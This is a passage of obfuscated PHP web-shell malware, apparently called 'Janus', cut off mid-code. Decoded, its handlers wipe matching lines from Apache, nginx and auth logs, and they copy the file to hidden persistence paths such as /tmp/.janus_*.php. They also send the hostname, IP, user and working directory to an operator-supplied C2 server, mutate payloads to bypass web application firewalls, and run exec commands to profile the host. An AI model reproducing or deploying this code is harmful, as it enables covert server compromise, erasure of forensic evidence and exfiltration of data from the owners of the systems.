$v1Pog["\155\145\x73\x73\141\x67\145"] = "\124\x6f\x2c\x20\x46\x72\x6f\x6d\x2c\x20\123\x75\x62\x6a\x65\143\164\x2c\x20\141\156\144\40\x4d\x65\x73\163\141\147\145\40\141\162\145\40\x72\x65\x71\165\151\162\145\144\56"; goto EvXKA; GE2QE: if (!(empty($gU_W4) || empty($CbYGj) || empty($RxRgD) || empty($p0UP_))) { goto dbjQR; } goto CFy5l; rR7Oh: yGFdY: goto OQsmI; m0Ysr: $EmQAC .= "\x58\x2d\115\141\151\154\145\x72\72\40\x50\x48\x50\x2f" . phpversion(); goto JIj0h; thxn3: $EmQAC .= $JTRCd . "\15\12"; goto zrLlt; eXGse: if (empty($JTRCd)) { goto eK6km; } goto thxn3; OQsmI: goto vbH70; goto Sdkwf; a16R8: $JTRCd = $_POST["\150\145\141\x64\145\162\163"] ?? ''; goto GE2QE; Sdkwf: case "\x77\x68\x6d\x63\163\137\x64\145\143\x6f\x64\x65\162": goto wIP3X; tsA58: goto vbH70; goto xRg4j; GiDgt: Y6hoD: goto zvzSa; wIP3X: $wSe9x = $_POST["\x65\156\143\x6f\x64\x65\x64"] ?? ''; goto Ja4Qp; HjLON: $v1Pog["\x6d\145\163\163\141\147\x65"] = "\x45\156\x63\157\144\145\144\40\x73\164\162\x69\156\147\x20\151\x73\x20\x72\145\161\x75\151\x72\x65\144\x2e"; goto Ktrzd; Ktrzd: goto vbH70; goto GiDgt; cllKh: try { goto GvkW3; CGowP: D4gwH: goto NrCyF; NrCyF: JZPAd: goto KLlm5; N8a9z: if (!($yDKeU === false)) { goto D4gwH; } goto gS70H; gS70H: $yDKeU = @gzinflate(@base64_decode($wSe9x)); goto lEm4S; lEm4S: if (!($yDKeU === false)) { goto z3mcb; } goto ET7w_; KLlm5: $v1Pog = ["\x73\164\141\164\x75\163" => "\x73\165\x63\143\145\163\163", "\x64\145\143\x6f\144\145\x64" => $yDKeU]; goto M34lb; GwECq: if (!($yDKeU === false || base64_encode($yDKeU) !== $wSe9x)) { goto JZPAd; } goto AJ7CT; dJpkc: z3mcb: goto CGowP; AJ7CT: $yDKeU = @hex2bin($wSe9x); goto N8a9z; ET7w_: $yDKeU = "\x55\156\x61\142\x6c\x65\40\x74\x6f\x20\x64\145\143\157\144\x65\56\40\x54\x72\x79\40\144\x69\146\146\145\x72\x65\156\164\x20\145\156\x63\x6f\x64\151\x6e\x67\56"; goto dJpkc; GvkW3: $yDKeU = @base64_decode($wSe9x); goto GwECq; M34lb: } catch (Exception $smUM0) { $v1Pog["\155\x65\163\x73\x61\147\x65"] = "\x45\x72\x72\157\x72\x3a\x20" . $smUM0->getMessage(); } goto tsA58; Ja4Qp: if (!empty($wSe9x)) { goto Y6hoD; } goto HjLON; zvzSa: $yDKeU = ''; goto cllKh; xRg4j: case "\x61\x64\166\141\156\x63\145\144\137\154\157\x67\137\x63\x6c\x65\x61\x6e\145\x72": goto xX4Dl; KTPWc: foreach ($zChAa as $fE6aL) { goto kdhWP; RJ2Mn: HCulm: goto YRGX3; kdhWP: if (!(file_exists($fE6aL) && is_readable($fE6aL) && is_writable($fE6aL))) { goto lrbv9; } goto xuGKZ; xuGKZ: $dzLi_[] = $fE6aL; goto TZ6iZ; TZ6iZ: lrbv9: goto RJ2Mn; YRGX3: } goto DrGPb; t8Rgs: if (!empty($dzLi_)) { goto dP1T9; } goto I84BF; gM3q0: foreach ($dzLi_ as $lbmK9) { goto r6Sei; E0eNE: try { goto OIWNs; znfES: $dZfB7 = $P2irp - count($bLO8i); goto vie21; FRUD0: $DgfE0 = $lbmK9 . "\x2e\142\141\143\153\165\160\x2e" . date("\x59\155\144\110\151\163"); goto uoJwu; eG7rr: $IdX4r = explode("\12", $Lrz4Z); goto XR9e6; uoJwu: @file_put_contents($DgfE0, $Lrz4Z); goto NdcUG; AVqmC: $bLO8i = []; goto pF8G1; pF8G1: foreach ($IdX4r as $oTjJ5) { goto j4Ftd; M65GP: ygSqO: goto u8Ytb; NM4j4: if ($bVqmg) { goto QEjVA; } goto gWxfs; gWxfs: $bLO8i[] = $oTjJ5; goto dcnBV; AAVZH: Q31Kc: goto NM4j4; j4Ftd: $bVqmg = false; goto psQ7G; psQ7G: foreach ($Ks1al as $c7Q3k) { goto LV92x; nf5i2: $bVqmg = true; goto zB1ON; zB1ON: goto Q31Kc; goto ZXD0e; ZXD0e: hIJi3: goto mOBGI; mOBGI: Rhe5l: goto o9j2Q; LV92x: if (!(stripos($oTjJ5, $c7Q3k) !== false)) { goto hIJi3; } goto nf5i2; o9j2Q: } goto AAVZH; dcnBV: QEjVA: goto M65GP; u8Ytb: } goto BOICN; BOICN: nSgv7: goto znfES; vie21: if (!$eN4d9) { goto XWLy3; } goto FRUD0; GqAm2: if (!($Lrz4Z === false)) { goto UZnse; } goto aHKeT; joYIQ: @file_put_contents($lbmK9, implode("\12", $bLO8i)); goto Fi34Y; OIWNs: $Lrz4Z = @file_get_contents($lbmK9); goto GqAm2; aHKeT: $YXtB3[] = "\106\141\151\154\x65\144\x20\164\157\x20\162\x65\x61\144\72\x20{$lbmK9}"; goto nJVuZ; J8ft3: UZnse: goto eG7rr; nJVuZ: goto jRMnd; goto J8ft3; NdcUG: XWLy3: goto joYIQ; Fi34Y: $e0rrC[] = ["\160\141\x74\x68" => $lbmK9, "\157\x72\151\x67\x69\x6e\x61\154\x5f\154\151\x6e\x65\x73" => $P2irp, "\x72\x65\x6d\x6f\166\145\x64\x5f\154\151\156\145\163" => $dZfB7, "\162\145\155\141\x69\156\x69\x6e\x67\x5f\154\x69\x6e\x65\x73" => count($bLO8i)]; goto vLu1c; XR9e6: $P2irp = count($IdX4r); goto AVqmC; vLu1c: } catch (Exception $smUM0) { $YXtB3[] = "\105\x72\162\x6f\162\x20\x70\162\x6f\143\x65\163\x73\151\156\147\x20{$lbmK9}\72\40" . $smUM0->getMessage(); } goto ofPsE; h_7fU: Yjicc: goto E0eNE; uEJog: $YXtB3[] = "\x43\141\x6e\x6e\x6f\164\x20\141\x63\143\x65\163\x73\72\x20{$lbmK9}"; goto Jh7Ue; ofPsE: jRMnd: goto v5E95; Jh7Ue: goto jRMnd; goto h_7fU; r6Sei: if (!(!file_exists($lbmK9) || !is_readable($lbmK9) || !is_writable($lbmK9))) { goto Yjicc; } goto uEJog; v5E95: } goto PdgST; PdgST: IHyfr: goto oxEI4; FBVm3: $YXtB3 = []; goto t8Rgs; OOMqq: $dzLi_ = array_filter(array_map("\x74\x72\x69\155", explode("\xa", $cyMTq))); goto aDNNw; JudAE: goto vbH70; goto xy1Wx; Tw_m1: $ZuO97 = $_POST["\x6b\145\x79\x77\x6f\162\x64\163"] ?? ''; goto TV75b; aDNNw: $Ks1al = array_filter(array_map("\164\x72\x69\x6d", explode("\xa", $ZuO97))); goto RWNKg; oxEI4: $v1Pog = ["\163\x74\141\x74\x75\163" => "\163\x75\x63\143\x65\163\163", "\143\x6c\145\x61\x6e\145\x64" => $e0rrC, "\145\x72\162\x6f\x72\x73" => $YXtB3, "\x74\157\164\141\154\137\x63\154\x65\x61\156\145\144" => count($e0rrC)]; goto JudAE; RWNKg: $e0rrC = []; goto FBVm3; xX4Dl: $cyMTq = $_POST["\154\x6f\147\137\x70\x61\x74\150\x73"] ?? ''; goto Tw_m1; DrGPb: smjiJ: goto Y4ZPr; I84BF: $zChAa = ["\x2f\166\x61\x72\x2f\154\x6f\147\x2f\141\x70\141\x63\150\x65\62\x2f\x61\143\x63\x65\x73\163\56\154\157\x67", "\x2f\166\141\x72\57\154\157\147\57\141\160\141\x63\150\x65\x32\57\145\162\162\157\x72\x2e\154\x6f\147", "\x2f\166\141\162\57\x6c\x6f\147\57\150\164\164\x70\x64\57\x61\x63\143\x65\163\x73\x5f\154\x6f\147", "\57\x76\x61\x72\x2f\154\157\x67\x2f\x68\x74\x74\x70\144\57\145\x72\x72\x6f\x72\137\x6c\x6f\147", "\57\x76\141\x72\x2f\154\157\x67\x2f\156\x67\x69\156\x78\57\141\143\x63\145\163\x73\56\x6c\x6f\x67", "\57\x76\141\x72\x2f\154\x6f\x67\x2f\156\147\x69\156\170\57\x65\162\162\x6f\x72\x2e\154\157\147", "\x2f\166\141\x72\x2f\x6c\x6f\x67\x2f\x61\x75\164\150\x2e\154\x6f\x67", "\57\166\141\x72\57\154\x6f\x67\57\x73\x65\143\165\x72\x65", "\57\166\x61\x72\57\154\157\x67\57\155\145\163\163\x61\x67\145\x73", "\x2f\166\141\162\57\154\x6f\147\57\163\171\x73\154\157\147"]; goto KTPWc; Y4ZPr: dP1T9: goto gM3q0; TV75b: $eN4d9 = isset($_POST["\142\141\x63\x6b\165\x70"]) && $_POST["\142\x61\143\153\165\x70"] === "\164\162\165\145"; goto OOMqq; xy1Wx: case "\155\165\x6c\x74\151\137\x6c\x6f\143\x61\164\x69\x6f\x6e\137\x62\x61\143\x6b\x75\x70": goto a7sd5; jqq6v: sVHsL: goto Omgyp; cRBBO: $v1Pog["\155\145\163\163\141\147\145"] = "\106\x61\x69\154\x65\x64\40\164\157\x20\162\x65\x61\144\40\x73\x6f\165\x72\x63\145\40\146\x69\x6c\145\56"; goto Crdof; vOlqm: $v1Pog = ["\163\164\x61\164\165\163" => "\163\x75\x63\x63\x65\163\x73", "\x62\141\x63\x6b\145\144\x5f\165\160" => $lD5bJ, "\x66\x61\x69\154\x65\x64" => $O3gQP, "\164\157\x74\141\x6c" => count($vm9Xe), "\x73\x75\143\143\145\x73\x73\x5f\143\157\x75\x6e\164" => count($lD5bJ)]; goto sR_js; dnAJB: $FkyGq = $_POST["\x62\x61\143\153\165\x70\x5f\154\157\x63\141\164\151\157\x6e\163"] ?? ''; goto LSa8U; mC_Ay: $eCqBc = @file_get_contents($bw9Jt); goto oy1E9; LSa8U: if (!(empty($bw9Jt) || !file_exists($bw9Jt))) { goto NcQB1; } goto atT5d; Omgyp: $lD5bJ = []; goto YVRGH; a7sd5: $bw9Jt = $_POST["\163\157\x75\162\143\145\x5f\x66\151\154\145"] ?? ''; goto dnAJB; vYMzf: $GJABE = [dirname($bw9Jt) . "\x2f\x2e" . basename($bw9Jt) . "\x2e\x62\x61\x6b", "\57\x74\x6d\x70\57\56\152\x61\x6e\x75\163\x5f" . md5($bw9Jt) . "\x2e\x70\150\160", "\x2f\x76\x61\x72\x2f\164\x6d\x70\57\x2e\x6a\x61\x6e\165\x73\x5f" . md5($bw9Jt) . "\56\160\x68\160", dirname($bw9Jt) . "\x2f\56\x6a\x61\x6e\x75\x73\x5f\x62\x61\x63\x6b\x75\x70\x5f" . substr(md5($bw9Jt), 0, 8) . "\x2e\160\150\160"]; goto FEpNF; Crdof: goto vbH70; goto jqq6v; sR_js: goto vbH70; goto xrr4X; qgSZ9: foreach ($vm9Xe as $ICmbq) { goto S0tlg; so0G1: sVv8B: goto HlxLA; UJdum: $lD5bJ[] = $ICmbq; goto so0G1; od1Za: if (is_dir($jBFOE)) { goto L3kpe; } goto LgiJq; T80Xo: L3kpe: goto EfOOK; HlxLA: CEz93: goto P9PIi; GtIU_: XY1M6: goto uq1Ci; G_3nt: @file_put_contents($a1t4N, $eCqBc); goto IATBK; yfxR9: goto sVv8B; goto GtIU_; uq1Ci: @chmod($ICmbq, 0644); goto fqkEX; cLK2x: RfWDX: goto UJdum; LgiJq: @mkdir($jBFOE, 0755, true); goto T80Xo; IATBK: @chmod($a1t4N, 0644); goto cLK2x; EfOOK: if (@file_put_contents($ICmbq, $eCqBc) !== false) { goto XY1M6; } goto m9FnJ; fqkEX: if (!(basename($ICmbq)[0] !== "\x2e")) { goto RfWDX; } goto r1PMc; r1PMc: $a1t4N = $jBFOE . "\x2f\56" . basename($ICmbq); goto G_3nt; S0tlg: $jBFOE = dirname($ICmbq); goto od1Za; m9FnJ: $O3gQP[] = $ICmbq; goto yfxR9; P9PIi: } goto eukby; FEpNF: $vm9Xe = $GJABE; goto gRRtp; atT5d: $v1Pog["\x6d\145\163\x73\x61\147\145"] = "\123\157\x75\162\143\145\x20\x66\x69\x6c\145\40\x64\x6f\x65\163\40\156\x6f\x74\40\x65\x78\x69\x73\164\56"; goto KLhg3; gRRtp: ySYqA: goto mC_Ay; LJrSv: $vm9Xe = array_filter(array_map("\164\162\x69\x6d", explode("\xa", $FkyGq))); goto Lv9T7; KLhg3: goto vbH70; goto opdMj; YVRGH: $O3gQP = []; goto qgSZ9; oy1E9: if (!($eCqBc === false)) { goto sVHsL; } goto cRBBO; Lv9T7: if (!empty($vm9Xe)) { goto ySYqA; } goto vYMzf; eukby: HWByv: goto vOlqm; opdMj: NcQB1: goto LJrSv; xrr4X: case "\143\x32\x5f\143\157\x6d\155\165\x6e\x69\x63\141\x74\145": goto tYWNq; Y7OdZ: $HykFe = ZiyvN($puVa9); goto uJIrk; EDm1n: $olRGv = @file_get_contents($l3bQG, false, $yr3s9); goto G5SdS; AUMqE: I0FGy: goto KoZ9q; p6RJn: $v1Pog = ["\x73\x74\x61\x74\165\163" => "\163\165\143\143\x65\163\163", "\150\x74\x74\x70\x5f\143\x6f\144\145" => $KyZpx, "\162\145\x73\x70\x6f\x6e\x73\x65" => $olRGv, "\160\x61\x79\x6c\x6f\x61\x64\x5f\163\145\x6e\x74" => $sv0qE]; goto mcvVW; mcvVW: goto ajYKA; goto wZe8N; wZe8N: ufvJ4: goto CDFzk; ydxcH: if (isset($http_response_header) && is_array($http_response_header)) { goto nXqKn; } goto K2ifL; RvL4z: $yr3s9 = stream_context_create($xd_Oi); goto EDm1n; flPot: $X5ufN = json_encode($sv0qE); goto eOAFy; PvzDh: O1h7d: goto rC7P9; pUZIM: ajYKA: goto WrytU; K2ifL: $KyZpx = 200; goto Vu1YB; tYWNq: $l3bQG = $_POST["\x63\x32\137\165\162\154"] ?? ''; goto H_HGj; uJIrk: Eben6($puVa9); goto AUMqE; uoDPX: nOg7N: goto w0F07; G_mEK: $siOBH = $_POST["\x64\x61\x74\x61"] ?? ''; goto awBOL; DipDZ: $xd_Oi = ["\150\164\164\x70" => ["\x6d\x65\164\x68\x6f\144" => "\x50\117\123\x54", "\x68\145\141\144\145\x72" => ["\103\157\156\x74\145\x6e\x74\55\124\x79\x70\x65\x3a\40\x61\160\x70\154\x69\x63\141\164\151\157\156\x2f\152\x73\x6f\156", "\125\x73\x65\162\55\101\147\145\156\x74\x3a\40\x4d\x6f\x7a\x69\154\x6c\141\x2f\65\56\x30\40\x28\x63\x6f\155\x70\x61\x74\151\x62\x6c\x65\73\x20\x4a\141\x6e\165\163\x2f\61\x2e\60\x29", "\x43\157\x6e\164\145\x6e\x74\55\x4c\x65\156\x67\164\x68\x3a\40" . strlen($X5ufN)], "\x63\x6f\x6e\164\x65\156\164" => $X5ufN, "\x74\x69\155\x65\x6f\x75\164" => 10, "\151\x67\x6e\x6f\x72\145\137\145\x72\x72\157\x72\163" => true], "\x73\x73\x6c" => ["\x76\145\162\151\x66\171\137\x70\x65\145\162" => false, "\x76\145\x72\151\146\x79\137\x70\x65\x65\162\x5f\156\x61\155\145" => false, "\141\x6c\154\157\x77\137\163\145\154\x66\137\163\151\147\x6e\145\x64" => true]]; goto RvL4z; tvJ39: goto I0FGy; goto SpobM; etNN_: $olRGv = o397w($puVa9); goto ELSg4; CDFzk: $v1Pog = ["\163\x74\x61\164\x75\163" => "\145\162\x72\157\162", "\x6d\145\163\163\x61\x67\x65" => "\103\62\x20\143\157\155\x6d\x75\156\151\143\x61\x74\x69\157\x6e\x20\146\141\x69\x6c\145\x64\x3a\40" . $HykFe]; goto pUZIM; iADdk: $HykFe = ''; goto MOjZX; XJjqm: lezyI($puVa9, [t5D5r => true, Jzs4E => $X5ufN, NNhCd => true, yylOA => 10, iSR5k => ["\103\x6f\156\164\x65\x6e\x74\x2d\124\x79\x70\x65\72\x20\141\160\x70\x6c\151\143\x61\164\x69\157\156\57\152\163\157\x6e", "\125\x73\x65\162\x2d\x41\147\x65\x6e\x74\72\x20\x4d\x6f\172\x69\154\154\141\x2f\65\x2e\x30\40\x28\x63\157\x6d\160\x61\x74\x69\142\154\x65\73\x20\112\x61\x6e\x75\163\57\x31\x2e\60\51"], ts5wd => false, jokAg => false]); goto etNN_; aI3kC: $v1Pog["\155\145\x73\163\141\x67\x65"] = "\x43\62\40\x55\x52\114\x20\x69\163\40\162\145\161\x75\151\162\x65\144\x2e"; goto pNAB3; KoZ9q: if ($olRGv === false) { goto ufvJ4; } goto p6RJn; eOAFy: $olRGv = false; goto umwOX; u3WCY: PmF9T: goto ydxcH; H_HGj: $VtInv = $_POST["\141\x63\x74\151\x6f\x6e"] ?? "\x63\x68\x65\143\x6b\x69\156"; goto G_mEK; G5SdS: if ($olRGv !== false) { goto PmF9T; } goto RWeW6; LNMKI: $puVa9 = miybs($l3bQG); goto XJjqm; pNAB3: goto vbH70; goto uoDPX; MOjZX: if (function_exists("\155\151\171\102\x73")) { goto VZMgy; } goto DipDZ; RWeW6: $HykFe = "\106\x61\x69\154\x65\144\40\x74\157\x20\143\157\x6e\156\x65\x63\x74\x20\164\x6f\x20\x43\x32\40\163\x65\162\166\x65\162"; goto fPAuI; ELSg4: $KyZpx = ls5s7($puVa9, tDRkT); goto Y7OdZ; SpobM: VZMgy: goto LNMKI; umwOX: $KyZpx = 0; goto iADdk; awBOL: if (!empty($l3bQG)) { goto nOg7N; } goto aI3kC; u_My2: j5Ouj: goto PvzDh; fPAuI: goto HwNoz; goto u3WCY; WrytU: goto vbH70; goto TNzaI; w0F07: $sv0qE = ["\x61\143\x74\x69\x6f\156" => $VtInv, "\163\x68\145\x6c\x6c\x5f\x69\144" => md5(__FILE__ . $_SERVER["\123\x45\122\126\105\x52\x5f\116\x41\x4d\105"]), "\x74\x69\155\145\x73\164\x61\155\160" => time(), "\150\x6f\163\x74\x6e\141\x6d\x65" => gethostname(), "\x73\x65\x72\x76\x65\x72\137\156\141\x6d\145" => $_SERVER["\x53\x45\122\126\105\122\137\116\101\x4d\x45"] ?? '', "\151\x70" => $_SERVER["\x53\x45\122\x56\x45\122\x5f\x41\104\x44\x52"] ?? '', "\x75\x73\145\162" => get_current_user(), "\143\x77\144" => getcwd(), "\144\x61\x74\141" => $siOBH]; goto flPot; rC7P9: HwNoz: goto tvJ39; pswk6: nXqKn: goto JES7e; JES7e: foreach ($http_response_header as $r9AVH) { goto SfUV7; EN5h6: $KyZpx = (int) $I5WkF[1]; goto ib16A; ib16A: goto j5Ouj; goto ehKP4; IzstI: LPhyh: goto wIrIF; ehKP4: sauw_: goto IzstI; SfUV7: if (!preg_match("\57\110\x54\x54\x50\134\x2f\x5c\144\134\56\x5c\x64\134\163\x2b\50\134\x64\53\x29\57", $r9AVH, $I5WkF)) { goto sauw_; } goto EN5h6; wIrIF: } goto u_My2; Vu1YB: goto O1h7d; goto pswk6; TNzaI: case "\x77\141\146\x5f\x62\x79\160\141\163\x73\x5f\164\145\163\x74": goto U20Uq; u0m_R: RXLla: goto u4yxR; mai41: $gSi8X = []; goto lj50d; gBmzy: if (!isset($hwFfN[$BoTZ6])) { goto RXLla; } goto k_rPt; hAcHA: goto vbH70; goto qROt1; u4yxR: goto cMw6Y; goto ic4AK; v3VRh: $BoTZ6 = $_POST["\164\145\x63\150\156\151\x71\x75\x65"] ?? "\x61\x6c\x6c"; goto Tb7ag; iWxcA: cMw6Y: goto ksMtB; ksMtB: $v1Pog = ["\163\164\x61\x74\165\163" => "\163\165\143\143\x65\163\x73", "\162\x65\x73\x75\x6c\x74\x73" => $gSi8X, "\164\x6f\164\x61\154\x5f\x74\x65\163\x74\x65\144" => count($gSi8X)]; goto q8xJj; TsoBO: zeJ58: goto iWxcA; nqo95: $v1Pog["\155\145\163\x73\x61\147\145"] = "\x54\x61\162\x67\x65\x74\40\125\122\x4c\40\141\x6e\144\40\x70\141\171\154\x6f\141\x64\x20\141\162\x65\x20\x72\x65\x71\165\151\x72\145\144\56"; goto hAcHA; rYX8L: foreach ($hwFfN as $D2Kbj => $s2lfS) { goto UdW1q; oYmzf: RGiIX: goto vhfx3; UdW1q: foreach ($s2lfS as $zME47 => $Y_tWV) { goto w_qjT; UqJ5u: $gSi8X[] = ["\164\x65\x63\x68\156\x69\x71\x75\145" => "{$D2Kbj}\72{$zME47}", "\x70\141\171\x6c\x6f\141\144" => $Y_tWV, "\x68\x74\164\160\x5f\x63\x6f\144\145" => $KyZpx, "\142\154\x6f\x63\153\x65\144" => $KyZpx === 403 || $KyZpx === 406]; goto lpNwL; f818q: $olRGv = $spw0O($OcEmc, $X5ufN); goto UqJ5u; lpNwL: Nc1IC: goto Yx0ha; w_qjT: $X5ufN = http_build_query(["\x74\145\163\x74" => $Y_tWV]); goto f818q; Yx0ha: } goto Co9RM; Co9RM: n2lmu: goto oYmzf; vhfx3: } goto TsoBO; lj50d: $spw0O = function ($INZQZ, $X5ufN) use(&$KyZpx) { goto SdKmZ; rVTyM: if (function_exists("\115\111\x59\142\163")) { goto NqeWw; } goto p9xqg; sDafv: $olRGv = O397W($puVa9); goto xqnGH; MGKis: NqeWw: goto tWu4s; deLI6: SMgv5: goto tI1yI; HdnrF: if (!($olRGv !== false && isset($http_response_header))) { goto rnBiz; } goto fN1dx; VJ7nt: EBeN6($puVa9); goto e5bgO; Jk43i: $olRGv = @file_get_contents($INZQZ, false, $yr3s9); goto HdnrF; tVVLR: return $olRGv; goto uvbRU; AIJy3: lezYi($puVa9, [t5D5r => true, Jzs4E => $X5ufN, NNhCd => true, yylOA => 5, AKu6j => true, ts5wd => false]); goto sDafv; e5bgO: return $olRGv; goto vEAwg; vEAwg: u6fOA: goto zHPKD; xqnGH: $KyZpx = lS5s7($puVa9, tDRkT); goto VJ7nt; SdKmZ: $KyZpx = 0; goto rVTyM; tI1yI: rnBiz: goto tVVLR; p9xqg: $xd_Oi = ["\x68\x74\164\160" => ["\x6d\x65\164\150\157\x64" => "\120\x4f\123\124", "\150\x65\x61\x64\x65\x72" => "\x43\x6f\156\x74\145\156\x74\x2d\124\x79\160\x65\72\40\141\x70\160\154\x69\x63\x61\164\x69\157\156\57\170\55\167\x77\167\55\146\x6f\x72\155\x2d\x75\162\154\145\x6e\143\157\x64\145\144", "\143\157\156\x74\145\x6e\x74" => $X5ufN, "\x74\x69\x6d\x65\157\165\x74" => 5, "\151\147\x6e\x6f\162\x65\137\x65\162\x72\x6f\x72\163" => true], "\x73\x73\154" => ["\x76\145\x72\x69\x66\171\137\x70\145\145\162" => false, "\x76\145\162\151\146\171\137\160\145\x65\162\137\x6e\141\x6d\x65" => false]]; goto Gt8yA; uvbRU: goto u6fOA; goto MGKis; fN1dx: foreach ($http_response_header as $r9AVH) { goto L_YiK; VVolT: $KyZpx = (int) $I5WkF[1]; goto t3E0O; wzA5w: sl3PN: goto FAC1_; t3E0O: goto SMgv5; goto kE2qf; kE2qf: Ij1nH: goto wzA5w; L_YiK: if (!preg_match("\x2f\110\124\124\x50\x5c\x2f\134\x64\134\x2e\x5c\144\134\163\x2b\x28\x5c\144\53\51\57", $r9AVH, $I5WkF)) { goto Ij1nH; } goto VVolT; FAC1_: } goto deLI6; Gt8yA: $yr3s9 = stream_context_create($xd_Oi); goto Jk43i; tWu4s: $puVa9 = MiybS($INZQZ); goto AIJy3; zHPKD: }; goto ee7nL; q8xJj: goto vbH70; goto ble3c; Tb7ag: if (!(empty($OcEmc) || empty($sv0qE))) { goto OXTUz; } goto nqo95; qROt1: OXTUz: goto UPkZ5; ee7nL: if ($BoTZ6 === "\x61\154\x6c") { goto pDEqW; } goto gBmzy; ic4AK: pDEqW: goto rYX8L; P2TQM: $sv0qE = $_POST["\160\x61\171\154\x6f\x61\144"] ?? ''; goto v3VRh; tcimh: igamP: goto u0m_R; U20Uq: $OcEmc = $_POST["\x74\141\162\x67\x65\164\x5f\x75\162\154"] ?? ''; goto P2TQM; k_rPt: foreach ($hwFfN[$BoTZ6] as $zME47 => $Y_tWV) { $gSi8X[] = ["\164\145\x63\x68\156\x69\x71\165\145" => "{$BoTZ6}\72{$zME47}", "\x70\141\x79\154\x6f\x61\x64" => $Y_tWV]; XuQqq: } goto tcimh; UPkZ5: $hwFfN = ["\x63\x61\163\145\x5f\x76\141\x72\x69\x61\x74\x69\157\156" => ["\163\164\162\x74\x6f\x6c\157\x77\145\162" => strtolower($sv0qE), "\163\164\x72\x74\157\165\160\160\145\162" => strtoupper($sv0qE), "\155\x69\170\x65\144\x5f\143\x61\x73\145" => rTW9i($sv0qE)], "\145\156\143\157\144\x69\156\147" => ["\165\x72\154\x5f\145\x6e\143\157\144\145" => urlencode($sv0qE), "\x64\x6f\165\x62\154\x65\x5f\165\x72\x6c\137\x65\x6e\x63\157\x64\145" => urlencode(urlencode($sv0qE)), "\165\x6e\151\143\157\x64\145\137\x65\x6e\143\x6f\x64\145" => function_exists("\162\131\63\x48\x50") ? Ry3hP($sv0qE, "\125\x54\x46\x2d\61\x36", "\125\x54\106\55\70") : $sv0qE, "\150\x65\170\137\145\x6e\143\x6f\x64\145" => bin2hex($sv0qE)], "\143\157\155\155\145\156\164\x5f\151\156\152\145\x63\164\x69\157\156" => ["\x73\161\x6c\137\143\157\x6d\x6d\145\156\164\x73" => str_replace("\40", "\x2f\x2a\x2a\x2f", $sv0qE), "\x68\164\155\154\137\143\x6f\155\x6d\145\x6e\164\x73" => str_replace("\x20", "\x3c\x21\x2d\x2d\40\x2d\55\76", $sv0qE)], "\x77\150\x69\x74\145\x73\x70\141\x63\145" => ["\164\x61\142" => str_replace("\x20", "\x9", $sv0qE), "\x6e\x65\167\154\x69\156\145" => str_replace("\x20", "\12", $sv0qE), "\156\165\154\x6c\x5f\142\x79\x74\145" => str_replace("\x20", "\x0", $sv0qE)], "\163\x74\x72\151\156\x67\137\143\157\x6e\x63\141\x74\x65\x6e\x61\x74\151\x6f\156" => ["\x63\x6f\x6e\x63\x61\x74" => str_replace("\x20", "\56", $sv0qE), "\141\162\162\x61\171" => "\133" . implode("\135\133", str_split($sv0qE)) . "\135"]]; goto mai41; ble3c: case "\163\171\163\164\145\155\x5f\x70\162\x6f\146\x69\x6c\145\x72": goto dNKcn; KY63x: foreach ($VsscF as $zME47 => $IhsOT) { goto N1R7B; N1R7B: foreach ($IhsOT as $j3_hR) { goto M_sJ7; i0LQk: Fyv3p: goto Gy1Wy; M_sJ7: if (!file_exists($j3_hR)) { goto Fyv3p; } goto B0F_C; Gy1Wy: s7_1o: goto uhhws; KEFnJ: goto oLFC2; goto i0LQk; B0F_C: $DnOhI["\x73\x6f\x66\x74\x77\x61\x72\145"][$zME47] = $j3_hR; goto KEFnJ; uhhws: } goto fz7SZ; fz7SZ: oLFC2: goto rb7gT; rb7gT: jvki3: goto nL9_M; nL9_M: } goto iQR9Z; AW1JT: if (!(function_exists("\145\x78\x65\x63") && !in_array("\x65\170\145\143", $DqyA2))) { goto doSCF; } goto qbDSF; qbDSF: $PLI3x = []; goto hoLMy; gJnjf: if (!($E8lIJ === "\x66\x75\154\x6c" || $E8lIJ === "\x73\x79\163\x74\145\155")) { goto fnHBn; } goto xo_b0; hoLMy: @exec("\151\160\x20\x61\144\144\x72\x20\x73\x68\157\167\40\x32\76\57\144\x65\x76\57\156\x75\x6c\154", $CSOr1); goto ai4eD; yfT0J: $v1Pog = ["\163\x74\141\164\165\163" => "\163\x75\x63\x63\145\163\163", "\160\162\x6f\x66\151\154\x65" => $DnOhI, "\164\151\x6d\x65\x73\164\x61\x6d\x70" => date("\131\x2d\x6d\55\x64\40\110\x3a\151\x3a\x73")]; goto pc18L; Yk3TH: $DnOhI["\163\x6f\x66\x74\167\x61\x72\x65"] = []; goto HE7V0; dNKcn: $E8lIJ = $_POST["\x70\x72\x6f\146\151\x6c\145\x5f\x74\171\160\145"] ?? "\x66\x75\x6c\154"; goto KkpFZ; ai4eD: @exec("\x69\146\143\x6f\156\x66\151\x67\40\62\76\x2f\x64\x65\x76\x2f\156\165\x6c\154", $z4U2t); goto fNpO3; enjs2: C4Z6t: goto XJwcP; I6NCb: if (!($E8lIJ === "\x66\x75\154\154" || $E8lIJ === "\156\145\x74\167\x6f\162\153")) { goto zbdqp; } goto YArQS; eo_nT: doSCF: goto x8Wk8; iQR9Z: YoSG8: goto enjs2; DoqfY: Ooea1: goto yfT0J; HE7V0: $VsscF = ["\141\x70\141\143\150\145" => ["\57\165\163\162\x2f\163\142\151\156\57\x61\x70\141\x63\x68\x65\x32", "\57\165\x73\x72\x2f\163\142\x69\x6e\x2f\150\164\x74\160\144", "\x2f\x65\164\143\57\141\160\x61\143\150\145\62"], "\x6e\147\151\156\x78" => ["\57\x75\x73\x72\x2f\163\142\x69\x6e\57\x6e\147\151\x6e\x78", "\x2f\x65\164\143\57\x6e\147\151\156\170"], "\x6d\x79\163\161\x6c" => ["\57\x75\x73\x72\x2f\142\x69\x6e\x2f\x6d\171\x73\x71\x6c", "\x2f\x75\x73\x72\57\163\x62\x69\156\57\x6d\x79\163\x71\x6c\x64"], "\160\150\x70" => ["\57\165\x73\x72\57\142\x69\156\57\160\x68\160", "\57\x75\x73\x72\x2f\142\151\156\x2f\x70\x68\x70\x2d\x66\x70\155"], "\160\171\x74\150\x6f\156" => ["\57\x75\163\x72\57\142\x69\x6e\x2f\x70\171\x74\150\157\156", "\57\165\163\x72\x2f\x62\x69\156\x2f\160\x79\164\150\x6f\156\63"], "\x70\145\x72\154" => ["\x2f\165\163\162\57\x62\151\x6e\57\x70\x65\x72\154"], "\156\157\144\145" => ["\57\x75\x73\162\x2f\x62\151\156\57\156\x6f\144\145", "\x2f\x75\163\x72\x2f\142\151\156\57\x6e\157\144\x65\x6a\x73"]]; goto KY63x; k7N6e: if (!($E8lIJ === "\x66\x75\x6c\x6c" || $E8lIJ === 